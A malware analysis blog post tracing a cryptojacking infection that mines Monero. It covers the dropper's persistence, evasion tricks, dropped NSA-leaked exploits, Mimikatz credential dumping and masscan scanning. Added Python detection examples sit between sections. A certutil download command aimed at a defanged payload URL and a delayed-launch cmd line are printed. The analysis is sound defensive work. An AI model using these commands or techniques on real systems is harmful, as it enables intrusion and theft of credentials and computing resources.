Cryptojacking: An Unwanted Guest

  • We analyse a cryptojacking attack that mines the Monero cryptocurrency. The value of Monero in US dollars has more than doubled over the first half of 2019, from $46 to $98. The rebound of the cryptocurrencies market means that cryptojacking is an increasingly profitable activity for criminals.
  • The use of freely-available exploits such as EternalBlue and DoublePulsar shows how exploits that were previously only available to nation state actors are gradually adopted by less sophisticated cybercrime players.
  • The use of Mimikatz, masscan and WinPcap also raises questions about the attackers’ aims beyond simply distributing coin mining malware.
  • Historically, coin mining malware has been regarded as a low severity threat, but attacks such as this demonstrate how this threat category has become more nefarious. Coin miners have started using techniques used by banking Trojans to evade detection, such as living-off-the-land binaries (LOLBins) for code execution, parent process ID (PPID) spoofing, and hiding files and payloads after execution to remain discreet.


The early adopters of cryptocurrencies like Bitcoin, Ethereum and Litecoin were privacy-conscious individuals and currency enthusiasts. Over time, however, the inherently pseudonymous nature of cryptocurrencies has attracted people with less noble intentions – those who wish to reduce the traceability of financial transactions associated with criminal activities.

One of the fundamental requirements for cryptocurrencies is to verify the details of each transaction so that transactions remain secure and trustworthy. There is no central managing authority in cryptocurrencies; the job of verification is performed by a global community of users, often referred to as “miners”. The transaction details of cryptocurrencies like Bitcoin are publicly available. A collection of transaction records forms a unit called a “block”. After a transaction is verified, each block is assigned a unique code called a “hash” and the complete transaction record is appended to the blockchain ledger. The process of verifying transactions and adding them to the blockchain requires solving complex and computationally intensive hashing problems. In exchange for solving these problems, miners are awarded a certain amount of cryptocurrency.

Solving the hashing problem takes substantial computing power, but can be sped up by using GPUs and specialist hardware called an ASIC (Application-Specific Integrated Circuit). ASICs are extremely costly and require considerable cooling effort, resulting in astronomical electricity bills for their owners. Without a doubt, cryptocurrency mining is a costly enterprise. 


Covert mining using stolen resources is called “cryptojacking”. Coin miner malware can be delivered through a variety of methods, including malicious email attachments, hyperlinks, drive-by downloads, compromised copies of common JavaScript libraries such as jQuery, and exploitation of vulnerabilities in Internet-facing devices such as email and web servers.

Attackers have also started using post-exploitation tools, enabling them to infect multiple computers by moving laterally within the compromised network. Cryptojacking activity tends to follow the value of cryptocurrencies. As the value of cryptocurrencies increases, cryptojacking becomes an increasingly profitable activity for criminals. It also has benefits over other means of generating revenue, such as ransomware: 

  • Ransomware is typically a one-time activity, and most enterprises don’t honour demands for the ransom. 
  • Ransomware attacks attract the attention of law enforcement agencies. 
  • If third-party ransomware is used, developers typically take a cut of any ransom money that is paid. 
  • The development of ransomware requires more skill than a coin miner. 
  • Detecting a coin miner is difficult compared to most malware because mining software can be used legitimately. 
  • Once a coin miner is deployed, an actor can monetise the infected host for as long as the host is online.

Infection Chain

Recently we came across a URL delivering coin mining malware. The payload was isolated by Bromium Secure Platform and provided a lot of data for understanding how the attack works. In this blog post, we analyse its behaviour and how it uses a suite of post-exploitation tools, including EternalBlue, to extend the intrusion into the victim’s network. This wasn’t your typical coin mining malware. 

The malware mines the Monero cryptocurrency. The value of Monero in US dollars has more than doubled over the first half of 2019, from $46 to $98. This appreciation is one possible reason why cryptojacking attacks are increasingly attractive to attackers. Monero, in particular, is favoured by criminal actors because it is less resource intensive to mine since it does not require an ASIC, unlike other cryptocurrencies. Ultimately, this means that attackers can target low-powered devices and still turn a profit. 

Figure 1 – Monero’s value in USD from December 2018 to June 2019.

Behavioral Analysis  

Main dropper
  • Filename: download.exe 
  • Size: 90 KB (92160 bytes) 
  • MD5: 0fe77bc5e76660ad45379204aa4d013c 
  • SHA1: 189D75F6485B7F220B143C0DD548D97BD7D81E3F 
  • SHA256: 6180a1db3b1267eec5fba215be7696435bcb746a34b3b8692c99554e9edbe68b 

This portable executable (PE) file is delivered through a URL. Looking at the sections of the file in PEStudio suggests that it was packed using UPX, an open-source packer.


Figure 2 – UPX packed binary.

When run, download.exe unpacks itself and copies the unpacked file to “C:\WebKitsSdk\2.7.92” with the name ophgsf.exe. 


Figure 3 – File write event after download.exe is unpacked. 

The newly written file is then run as a child process of download.exe. 


Figure 4 – Download.exe launches process ophgsf.exe.

The process then copies itself to C:\Windows\SysWOW64 with the name tgvbgq.exe and marks it as a hidden file. 


Figure 5 – Process ophgsf.exe copies itself to another location then hides it.

To make the malware persistent on the system, ophgsf.exe creates and launches a new service called Abcdef whose BinaryPath points to C:\Windows\System32\tgvbgq.exe. Because the CreateService API is called from a 32-bit process, the service’s configuration is marked as WOW64. When ophgsf.exe then calls the StartService API to launch the binary registered for the service, WOW64 file system redirection causes the binary to be launched from the C:\Windows\SysWOW64 directory rather than from the C:\Windows\System32\tgvbgq.exe path supplied in the binary path. The service is granted the following rights through the DesiredAccess parameter value (0xF0137):



Figure 6 – Service creation to establish persistence.

Launching a binary through a Windows service is a popular technique for several reasons. First, it breaks process-chain based detection, since the binary starts as a child of services.exe rather than of the dropper; second, when the service starts, the binary is always executed even though it is not a valid service executable. After starting the service, ophgsf.exe copies itself from C:\WebKitsSdk\2.7.92 to C:\Windows\SysWOW64 as “126860.bak” and then terminates itself.


Figure 7 – Ophgsf.exe deletes its binary and creates a backup file.

A PE file called SunloglicySrv.exe is downloaded and run by download.exe from the URL hxxp://fid[.]hognoob[.]se/SunloglicySrv.exe and saved to C:\WebKitsSdk\2.7.92\. Bromium Cloud Service classifies this threat as Win32.Trojan.Miner.


Figure 8 – HTTP GET request and response to download file SunloglicySrv.exe.


Figure 9 – Download.exe runs coin miner SunloglicySrv.exe.

After starting the coin miner process (SunloglicySrv.exe), download.exe then launches the certutil tool using command prompt (cmd.exe). Certutil is a Windows built-in tool used for managing digital certificates. The utility can also be used to download a file from a remote server. For example, by using the following command an attacker can download a file and save it locally: 

certutil.exe -urlcache -split -f [URL] DestinationFile 

In this case, the provided URL is hxxp://fid[.]hognoob[.]se/SunloglicySrv.exe and the destination file is %SystemRoot%\Temp\SunloglicySrv.exe. 

We see certutil being frequently misused as a LOLBin by malicious actors. One of the reasons malware authors prefer to download a payload using certutil is that using a signed Microsoft tool is less likely to be detected than using third-party programs. If the download using certutil was successful, cmd.exe runs the file. We found that the file (SunloglicySrv.exe) was the same coin miner that was downloaded and launched earlier by download.exe.


Figure 10 – Use of certutil to download a payload from a URL.

Afterwards, download.exe moves itself to the directory “%TEMP%\127172\….\” and saves the file under the name “TemporaryFile”. It then renames the directory “….” to “%TEMP%\127172\”. The reason for copying a file and then renaming a directory in this way is to break file tracking: the Windows file system doesn’t deliver per-file callbacks for the files inside a directory during a directory rename operation, so this technique allows malware authors to bypass tracking of their binary by security solutions and makes the job of an auditor a whole lot harder. Finally, download.exe ends its process.
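
The directory-rename trick above defeats monitors that key on a file’s path; an added example (not from the original post) shows this with three monitors side by side, keyed on path, on the file’s volume identity, and on its content hash. Everything in it is constructed: a scratch directory stands in for %TEMP%\127172 and a short byte string stands in for download.exe.

```python
"""Why path-keyed file tracking loses a dropped binary across a directory
rename while identity- or hash-keyed tracking does not. Constructed scenario
modelled on the download.exe behaviour described above."""
import hashlib
import os
import tempfile

SAMPLE_PAYLOAD = b"MZ-constructed-sample-not-a-real-binary"  # constructed stand-in


def file_identity(path):
    """Stable (device, file-index) pair. On NTFS Python exposes the file
    reference number through st_ino; on POSIX it is the inode. Neither
    changes when a parent directory is renamed, which is what we rely on."""
    st = os.stat(path)
    return (st.st_dev, st.st_ino)


def content_hash(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()


def run_demo(root):
    """Drop a file in <root>/staging/, then rename 'staging' to '127172' the
    way the malware renames its dotted directory. Returns which of three
    monitors still recognises the file at its new location."""
    staging = os.path.join(root, "staging")
    os.makedirs(staging)
    old_path = os.path.join(staging, "TemporaryFile")
    with open(old_path, "wb") as f:
        f.write(SAMPLE_PAYLOAD)

    # Three monitors record what they saw when the file was written.
    seen_paths = {old_path}
    seen_ids = {file_identity(old_path)}
    seen_hashes = {content_hash(old_path)}

    # The evasion step: a single directory rename. The file itself is never
    # touched, so a per-file write/rename hook fires nothing for it.
    final_dir = os.path.join(root, "127172")
    os.rename(staging, final_dir)
    new_path = os.path.join(final_dir, "TemporaryFile")

    return {
        "by_path": new_path in seen_paths,                   # lost
        "by_identity": file_identity(new_path) in seen_ids,  # still tracked
        "by_hash": content_hash(new_path) in seen_hashes,    # still tracked
        "old_path_exists": os.path.exists(old_path),         # gone
    }


def run_demo_in_tempdir():
    """Run the demo in a scratch directory that is removed afterwards."""
    with tempfile.TemporaryDirectory() as root:
        return run_demo(root)


if __name__ == "__main__":
    for monitor, still_tracked in run_demo_in_tempdir().items():
        print(f"{monitor:16} {still_tracked}")
```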


Figure 11 – Download.exe copies itself to the user’s %TEMP% directory.

SunloglicySrv.exe (Win32.Trojan.Mbt) 

The coin miner process is launched from C:\WebKitsSdk\2.7.92 and copies itself to C:\Windows\ugrpkute with the name tpcunli.exe. Once a copy is created, it follows the same technique of breaking file tracking by moving the file from C:\WebKitsSdk\2.7.92 to C:\Users\bruser1729\AppData\Local\Temp\127437\….\ using the file name “TemporaryFile”, before renaming the directory to C:\Users\bruser1729\AppData\Local\Temp\127437\. 

  • Filename: tpcunli.exe  
  • File Path: C:\Windows\ugrpkute 
  • SHA256: e5f1244002929418a08d4623b7de39ccf591acb868d0e448ed4f7174d03c2c81 
  • Bromium Cloud Service classification: Win32.Trojan.Mbt 

Figure 12 – SunloglicySrv.exe copies itself to the user’s %TEMP% directory.

The process then runs tpcunli.exe from cmd.exe using the start command, chained after a ping command that delays the launch of the program by five seconds. This is a common way to delay the execution of commands. After running the command, SunloglicySrv.exe ends its process.

cmd /c ping -n 5 & Start C:\Windows\ugrpkute\tpcunli.exe 
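
Both the certutil download described earlier and the ping-then-start idiom above leave distinctive command lines in process-creation telemetry; the following detection logic is an added example, not from the original post, and runs over constructed events. The `parent=… image=… cmdline="…"` line format is an assumption made for this demo rather than any product’s real log format.

```python
"""Flag certutil-as-downloader and 'ping -n N & start' delay idioms in
process-creation events. Events below are constructed for the demo."""
import re

# Constructed events modelled on the behaviour in the analysis above.
SAMPLE_EVENTS = [
    r'parent=download.exe image=C:\Windows\System32\cmd.exe cmdline="cmd /c '
    r'certutil.exe -urlcache -split -f hxxp://fid[.]hognoob[.]se/SunloglicySrv.exe '
    r'C:\Windows\Temp\SunloglicySrv.exe"',
    r'parent=SunloglicySrv.exe image=C:\Windows\System32\cmd.exe '
    r'cmdline="cmd /c ping -n 5 & Start C:\Windows\ugrpkute\tpcunli.exe"',
    r'parent=explorer.exe image=C:\Windows\System32\certutil.exe '
    r'cmdline="certutil -hashfile C:\Users\alice\setup.exe SHA256"',   # benign
    r'parent=explorer.exe image=C:\Windows\System32\cmd.exe '
    r'cmdline="cmd /c ping -n 4 10.0.0.1"',                            # benign
]

EVENT_RE = re.compile(r'parent=(?P<parent>\S+)\s+image=(?P<image>\S+)\s+cmdline="(?P<cmdline>.*)"$')
URL_RE = re.compile(r"^h(?:tt|xx)ps?://", re.IGNORECASE)   # accepts defanged hxxp too
PING_DELAY_RE = re.compile(r"\bping\s+-n\s+(\d+)\b.*?&\s*start\b", re.IGNORECASE)


def parse_event(line):
    m = EVENT_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised event line: {line!r}")
    return m.groupdict()


def certutil_download(cmdline):
    """True when certutil is asked to fetch a URL into a local file
    (-urlcache ... -f <url> <file>). Hashing or verifying a cert is not flagged."""
    tokens = cmdline.split()
    lowered = [t.lower() for t in tokens]
    uses_certutil = any(t in ("certutil", "certutil.exe") or t.endswith("\\certutil.exe")
                        for t in lowered)
    switches = {t.lstrip("-/") for t in lowered if t.startswith(("-", "/"))}
    has_url = any(URL_RE.match(t) for t in tokens)
    return uses_certutil and "urlcache" in switches and "f" in switches and has_url


def ping_delay_then_start(cmdline):
    """Return the ping count when the line is 'ping -n N ... & start ...'
    (the sleep idiom used before launching tpcunli.exe), else None."""
    m = PING_DELAY_RE.search(cmdline)
    return int(m.group(1)) if m else None


def scan(lines):
    """Return (rule, parent, image) for every event that matches a rule."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if certutil_download(ev["cmdline"]):
            findings.append(("certutil_download", ev["parent"], ev["image"]))
        if ping_delay_then_start(ev["cmdline"]) is not None:
            findings.append(("ping_delay_then_start", ev["parent"], ev["image"]))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(*finding)
```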

tpcunli.exe (Win32.Trojan.Coinminer) 

The process begins by modifying itself with another payload. Afterwards, it creates a service called “plikeztuc” where BinaryPath points to C:\Windows\ugrpkute\tpcunli.exe and the DesiredAccess is 0xF0137. After creating the service, it ends its process. 


Figure 13 – Service creation to establish persistence.

tpcunli.exe (Win32.Trojan.Mbt) 

  • Filename: tpcunli.exe  
  • File Path: C:\Windows\ugrpkute 
  • SHA256: 69481183822cbc5972843308746f1b32426c68375acd82ebe84f04930a4800ef 
  • Bromium Cloud Service classification: Win32.Trojan.Mbt 

The process runs the cacls tool, which is used to modify access control lists (ACLs). Specifically, it removes access permissions on the hosts file (drivers\etc\hosts) for members of the Users and Administrators groups and for the SYSTEM account.

Figure 14 – Removal of access to the hosts file.

The process also hides the current user’s Internet history and cookie files by changing their file properties and placing desktop.ini files in each subdirectory. 


Figure 15 – Hidden Internet history files.

Next, it runs netsh commands to block incoming Server Message Block (SMB) traffic. The commands resemble those used by WannaCry, which exploited an SMB version 1 vulnerability and applied similar IPsec policies to block TCP port 445.

Figure 16 – Netsh commands to apply IPSec policy to block incoming SMB traffic.

The process drops various publicly available tools and exploits, including those leaked by The Shadow Brokers in 2017. Those tools were developed by the National Security Agency’s Equation Group and have since been used by several malware authors, including the creators of WannaCry.

  • EternalChampion
  • EternalBlue 
  • EquationDrug 
  • EternalRomance 
  • Smbtouch-Scanner
  • DoublePulsar backdoor 
  • WinPcap 
  • Mimikatz 
  • ProcDump 
  • Exploit based on CVE-2017-8464 
  • masscan 

Figure 17 – Dropping of post–exploitation tools, including Equation Group exploits.

Next, tpcunli.exe installs WinPcap version 4.1.3 using the silent mode flag (“/S”). The properties of this file show that it was taken from the BMC TrueSight installer.


Figure 18 – Silent installation of WinPcap.


Figure 19 – WinPcap.exe file properties.

The WinPcap installer attempts to stop the services of BMC TrueSight and restarts the Netgroup Packet Filter (NPF) driver. 


Figure 20 – WinPcap stops services of BMC software.

Tpcunli.exe runs masscan (bgichmvs.exe) through cmd.exe and uses it to scan public IP ranges for open ports. Because masscan depends on the WinPcap driver (npf.sys), this likely explains why WinPcap was installed.


Figure 21 – Port scanner scans subnet for open TCP port 80 and generates output in JSON format.

Next, tpcunli.exe writes a list of hardcoded public IP address ranges to a file called ip.txt. It then launches masscan with that list as input to scan for open TCP port 7001 at a rate of 4096 packets per second, writing the output in JSON format. We believe it does so to find exposed Oracle WebLogic servers listening on port 7001 that may be vulnerable to CVE-2017-10271.


Figure 22 – List of hardcoded IP ranges.


Figure 23 – Masscan command scanning for TCP port 7001 in the IP ranges provided.

Next, tpcunli.exe runs Mimikatz (vfshost.exe) to extract credentials from the lsass.exe (Local Security Authority Subsystem Service) process using its sekurlsa module. This module retrieves passwords in plain text, which can be used for further attacks such as the pass-the-hash technique. Even when the command is run as Administrator, it requires the debug privilege.


Figure 24 – Dumping passwords using the sekurlsa module.


Figure 25 – Mimikatz command output saved in log.txt.

Tpcunli.exe copies itself to C:\Windows\IME using the file name masruql.exe. It then runs the Windows Task Scheduler command (schtasks.exe) to create two scheduled tasks. The first, “qnsegabbm”, runs masruql.exe under the SYSTEM account and recurs every minute. The second, “senutquec”, runs a command that modifies the access rights of C:\Windows\ugrpkute\tpcunli.exe to allow everyone; it also recurs every minute and runs under the SYSTEM account.


Figure 26 – First scheduled task.


Figure 27 – Second scheduled task.

Afterwards, tpcunli.exe drops another payload (enakii.exe) and its configuration file in C:\Windows\temp\zceliqcqn. The configuration file matches the format used by XMRig, a free Monero coin miner, suggesting that the malware is based on that software.

Payload Properties

  • Filename: enakii.exe 
  • Location: C:\Windows\temp\zceliqcqn 
  • SHA256: 245dfbbdcee07be690fbed16eea528e2a0ed7ebd67c179515a479b0693810cc7 
  • Bromium Cloud Service classification: Win32.Trojan.Coinminer 

Figure 28 – Configuration file of enakii.exe (XMRig Monero coin miner).

After dropping the payload, a third scheduled task called “kqivnbrqa” is created. It modifies the access rights of C:\Windows\TEMP\zceliqcqn\enakii.exe to allow everyone, recurs every minute and runs under the SYSTEM account.


Figure 29 – Third scheduled task.

Tpcunli.exe uses a PPID spoofing technique to launch the child process enakii.exe. It indirectly executes C:\Windows\TEMP\zceliqcqn\enakii.exe so that enakii.exe appears as a child process of C:\Windows\System32\spoolsv.exe rather than of tpcunli.exe.

One of the ways malware can perform PPID spoofing is to open a handle to the target parent process, call UpdateProcThreadAttribute to update the attribute list in the STARTUPINFOA structure used to create the child process, and set the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute to the handle of the target parent process.
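
Because the technique above rewrites exactly the value a child process reports as its parent, telemetry that carries only ParentProcessId cannot see the spoof; the following added example (not from the original post) shows how a sensor that also records the process that issued the create call can. It assumes a constructed `creating_pid` field, which corresponds to what a kernel callback registered with PsSetCreateProcessNotifyRoutineEx receives as CreatingThreadId, and all events and PIDs are constructed.

```python
"""Spot PPID spoofing in process-start telemetry. Rule 1 needs the real
creator of the child (assumed 'creating_pid' field); rule 2 is a fallback
for parent-only telemetry. Events and PIDs below are constructed."""

# Constructed process table: pid -> image path.
PROCESSES = {
    820: r"C:\Windows\System32\services.exe",
    1412: r"C:\Windows\System32\spoolsv.exe",
    3380: r"C:\Windows\ugrpkute\tpcunli.exe",
}

# Constructed process-start events modelled on the behaviour described above.
SAMPLE_EVENTS = [
    {"pid": 3380, "image": r"C:\Windows\ugrpkute\tpcunli.exe",
     "ppid": 820, "creating_pid": 820},        # started by the SCM
    {"pid": 4210, "image": r"C:\Windows\TEMP\zceliqcqn\enakii.exe",
     "ppid": 1412, "creating_pid": 3380},      # claims spoolsv, made by tpcunli
    {"pid": 4311, "image": r"C:\Windows\System32\PrintIsolationHost.exe",
     "ppid": 1412, "creating_pid": 1412},      # genuine spoolsv child
]

# Assumed baseline for the fallback heuristic: where spoolsv's children live.
SPOOLER_CHILD_DIRS = ("c:\\windows\\system32\\",)


def image_name(pid):
    return PROCESSES.get(pid, f"<unknown pid {pid}>")


def detect_ppid_spoofing(events):
    """Return a list of findings.
    creator_mismatch: the process that issued the create call is not the
      parent recorded on the child (possible only when creating_pid exists).
    unusual_spoolsv_child: works with parent-only telemetry; flags a
      spoolsv.exe child started from outside its normal directories."""
    findings = []
    for ev in events:
        claimed, creator = ev["ppid"], ev.get("creating_pid")
        parent_img, child_img = image_name(claimed), ev["image"]
        creator_img = image_name(creator) if creator is not None else "n/a"
        if creator is not None and creator != claimed:
            findings.append({"rule": "creator_mismatch", "child": child_img,
                             "claimed_parent": parent_img,
                             "actual_creator": creator_img})
        if (parent_img.lower().endswith("\\spoolsv.exe")
                and not child_img.lower().startswith(SPOOLER_CHILD_DIRS)):
            findings.append({"rule": "unusual_spoolsv_child", "child": child_img,
                             "claimed_parent": parent_img,
                             "actual_creator": creator_img})
    return findings


if __name__ == "__main__":
    for f in detect_ppid_spoofing(SAMPLE_EVENTS):
        print(f["rule"], f["child"], "claimed:", f["claimed_parent"],
              "creator:", f["actual_creator"])
```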

Figure 30 – Launch of enakii.exe via spoolsv.exe.

Tpcunli.exe also drops a tool (ouousbpro.exe) used to exploit CVE-2017-8464 by creating shortcut files (.LNK) for all non-existent drives. We believe it does this to spread to removable media and network drives. 


Figure 31 – CVE-2017-8464 exploit tool ouousbpro.exe.


Figure 32 – Creation of .LNK files for non-existent drives.

Figure 33 – Content of .LNK file FlashPlayer_K.lnk.

If the process continues to run, it tries to exploit an existing vulnerability in the system to move laterally.   


Figure 34 – Process interaction graph viewed in Bromium Controller.

The graph below shows the chain of events captured in the micro VM, which includes the dropping of payloads, indirect execution of processes and high severity events triggered by known malware behavioural patterns.

Figure 35 – High severity events raised during the infection life cycle.

Interesting Memory Strings – tpcunli.exe 

In our analysis, we found that tpcunli.exe is very noisy and drops all of the post-exploitation tools on the system. Additional memory strings were identified that hint at what else this malware does:

  • List of common passwords 
  • List of file extensions 
  • List of domain names 
  • Commands to dump the process memory of certain processes using Procdump which are then fed into Mimikatz to extract credentials: 


  • Commands to disable Windows firewall, SharedAccess, Windows Defender services.

Figure 36 – Hardcoded commands in memory to disable Windows Defender, Firewall and SharedAccess.

  • Fetch a configuration file cfg.ini from the following URLs:



Figure 37 – Contents of configuration file cfg.ini.

  • Use the following domain strings to download the coin miner payload:


  • Try to move laterally within the network using known credentials.

Figure 38 – Lateral movement using WMIC commands.

Threat Classifications


Figure 39 – Classification of dropped files by Bromium Cloud Service.

Indicators of Compromise (IOCs) 



*** This is a Security Bloggers Network syndicated blog from Bromium authored by Ratnesh Pandey. Read the original post at: